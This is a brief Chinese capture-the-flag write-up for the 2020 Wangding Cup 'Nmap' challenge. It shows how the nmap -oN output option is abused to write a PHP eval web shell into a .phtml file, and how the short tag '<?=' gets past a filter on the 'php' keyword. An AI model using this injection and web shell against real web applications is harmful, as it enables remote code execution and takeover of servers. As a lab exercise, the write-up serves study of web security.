[网鼎杯 2020 朱雀组]Nmap 1
打开题目
先扫一下127.0.0.1,与nmap结果一样
nmap 可以把结果写入文件里,这个文件格式甚至可以自己决定
nmap 127.0.0.1 -oN test.txt
这样就可以写shell进入文件
<?php @eval($_POST[1]);> -oN a.phtml
被拦截了,可能是php关键字,可以用=代替php
https://cloud.tencent.com/developer/article/1923932
<?= @eval($_POST[1]);> -oN a.phtml
访问一下路径
查看flag
浙公网安备 33010602011771号